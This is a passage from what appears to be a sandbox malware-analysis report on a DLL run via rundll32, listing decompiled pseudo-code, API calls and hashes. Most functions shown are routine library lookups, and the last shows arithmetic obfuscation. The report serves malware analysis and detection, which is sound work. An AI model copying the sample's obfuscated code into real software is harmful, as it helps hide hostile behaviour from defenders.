                                                                        0x10033b88
                                                                        0x10033be7
                                                                        0x10033beb
                                                                        0x10033bed
                                                                        0x10033bf5
                                                                        0x10033c04
                                                                        0x10033c04
                                                                        0x10033bf5
                                                                        0x10033c19
                                                                        0x10033c21
                                                                        0x10033c29
                                                                        0x10033c2e
                                                                        0x10033c2e
                                                                        0x10033c41
                                                                        0x10033c4c
                                                                        0x10033c57
                                                                        0x10033c62
                                                                        0x10033c76
                                                                        0x10033c7a
                                                                        0x10033c64
                                                                        0x10033c68
                                                                        0x10033c6d
                                                                        0x10033c70
                                                                        0x00000000
                                                                        0x10033c70
                                                                        0x10033c62
                                                                        0x10033b8a
                                                                        0x10033b92
                                                                        0x00000000
                                                                        0x10033bb3
                                                                        0x10033bc9
                                                                        0x10033bd1
                                                                        0x10033bdc
                                                                        0x00000000
                                                                        0x10033bdc

                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10033BB6
                                                                          • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                        • GetWindowLongA.USER32 ref: 10033C57
                                                                        • UpdateWindow.USER32(?), ref: 10033C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentUpdate
                                                                        • String ID: P
                                                                        • API String ID: 1906497633-3110715001
                                                                        • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                        • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}













                                                                        0x10025cf1
                                                                        0x10025cf8
                                                                        0x10025cfb
                                                                        0x10025d06
                                                                        0x10025d0b
                                                                        0x10025d0f
                                                                        0x10025d14
                                                                        0x10025d1e
                                                                        0x10025d28
                                                                        0x10025d2c
                                                                        0x10025d33
                                                                        0x10025d36
                                                                        0x10025d40
                                                                        0x10025d48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025d50
                                                                        0x10025d58
                                                                        0x10025d67
                                                                        0x10025d5a
                                                                        0x10025d63
                                                                        0x10025d63
                                                                        0x10025d6c
                                                                        0x10025d6f
                                                                        0x10025d7a
                                                                        0x10025d86
                                                                        0x10025d8e
                                                                        0x10025d8e
                                                                        0x10025d38
                                                                        0x10025d38
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025CF1
                                                                          • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                          • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 821125782-1075368562
                                                                        • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                        • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}












                                                                        0x10034c68
                                                                        0x10034c6e
                                                                        0x10034c81
                                                                        0x10034c89
                                                                        0x10034cd6
                                                                        0x10034cd6
                                                                        0x10034c8f
                                                                        0x10034c8f
                                                                        0x10034c90
                                                                        0x10034c98
                                                                        0x10034ca6
                                                                        0x10034ca7
                                                                        0x10034cb3
                                                                        0x10034cb9
                                                                        0x10034cba
                                                                        0x10034cbb
                                                                        0x00000000
                                                                        0x10034cbd
                                                                        0x10034cc2
                                                                        0x10034ccf
                                                                        0x10034ccf
                                                                        0x10034cbb
                                                                        0x10034ce2

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                          • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                        • String ID: %s.dll
                                                                        • API String ID: 4178508759-3668843792
                                                                        • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                        • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}









                                                                        0x100364c9
                                                                        0x100364d1
                                                                        0x10036530
                                                                        0x10036530
                                                                        0x100364ec
                                                                        0x100364f0
                                                                        0x100364f5
                                                                        0x100364ff
                                                                        0x1003650a
                                                                        0x1003650b
                                                                        0x10036516
                                                                        0x10036523
                                                                        0x10036523
                                                                        0x10036516
                                                                        0x10036525
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: COMCTL32.DLL$DllGetVersion
                                                                        • API String ID: 1646373207-1518460440
                                                                        • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                        • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}







                                                                        0x10029a98
                                                                        0x10029a9d
                                                                        0x10029aa0
                                                                        0x10029ab5
                                                                        0x10029ab9
                                                                        0x10029ac2
                                                                        0x10029ad1
                                                                        0x10029ad9
                                                                        0x10029adb
                                                                        0x10029adb
                                                                        0x10029ae5

                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                        • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLongNameWindowlstrcmpi
                                                                        • String ID: combobox
                                                                        • API String ID: 2054663530-2240613097
                                                                        • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                        • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = E10019589;
						 *0x1004f820 = E10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}









                                                                        0x10019599
                                                                        0x1001959b
                                                                        0x100195a0
                                                                        0x100195a5
                                                                        0x100195ac
                                                                        0x100195b5
                                                                        0x100195db
                                                                        0x100195db
                                                                        0x100195e0
                                                                        0x100195b7
                                                                        0x100195bc
                                                                        0x100195c4
                                                                        0x00000000
                                                                        0x100195c6
                                                                        0x100195cc
                                                                        0x100195d2
                                                                        0x100195d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100195d9
                                                                        0x100195c4
                                                                        0x100195b5
                                                                        0x100195e5
                                                                        0x100195f1
                                                                        0x1001961a
                                                                        0x10019623

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                        Strings
                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                        • kernel32.dll, xrefs: 100195B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                        • API String ID: 1646373207-3733552308
                                                                        • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                        • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018BC6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E10018BC6() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x10042c68;
					_v20 =  *0x10042c60;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x10042c58]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                        0x10018bcb
                                                                        0x10018bd3
                                                                        0x10018bea
                                                                        0x10018b92
                                                                        0x10018b9b
                                                                        0x10018ba7
                                                                        0x10018baa
                                                                        0x10018bb0
                                                                        0x10018bb6
                                                                        0x10018bbb
                                                                        0x10018bc5
                                                                        0x10018bbd
                                                                        0x10018bc1
                                                                        0x10018bc1
                                                                        0x10018bd5
                                                                        0x10018bdb
                                                                        0x10018be3
                                                                        0x00000000
                                                                        0x10018be5
                                                                        0x10018be5
                                                                        0x10018be9
                                                                        0x10018be9
                                                                        0x10018be3

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,100131C1), ref: 10018BCB
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10018BDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: e314ec6c60ecec65d41af99910ac72b9b0e50ab7ed27774764df433c962e011c
                                                                        • Instruction ID: 6d1cec56d5ac0fa8db19260d1587fa22ee3b654c32ead3ba123bcf5a7b7114e3
                                                                        • Opcode Fuzzy Hash: e314ec6c60ecec65d41af99910ac72b9b0e50ab7ed27774764df433c962e011c
                                                                        • Instruction Fuzzy Hash: 48C012A020C201AEEA42ABF20C9CF8A218CEBA4783F000014A502EC080CF21DB808720
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}






























                                                                        0x10004dd2
                                                                        0x10004dd8
                                                                        0x10004de6
                                                                        0x10004de8
                                                                        0x10004dee
                                                                        0x10004df4
                                                                        0x10004dfd
                                                                        0x10004e06
                                                                        0x10004e1d
                                                                        0x10004e2f
                                                                        0x10004e2f
